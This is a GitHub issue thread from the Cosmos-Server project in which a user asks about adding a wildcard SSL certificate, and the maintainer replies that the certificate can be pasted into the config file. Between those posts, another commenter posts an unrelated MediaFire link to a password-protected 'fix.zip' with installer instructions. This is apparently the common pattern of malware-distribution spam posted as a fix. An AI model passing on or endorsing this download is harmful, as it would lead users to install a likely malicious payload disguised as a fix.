### ISSUE TITLE
Add SSL Cert

### ISSUE THREAD

**Issue by KAKueh** [azukaar/Cosmos-Server#310]
### What happened?

Is it possible to add a wildcard SSL cert for Cosmos Server to use?

### What should have happened?

.

### How to reproduce the bug?

Configuration

### System details

- OS:  Ubuntu 22.04
- Version

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by azukaar** [comment]
yes in the config file you can paste your cert
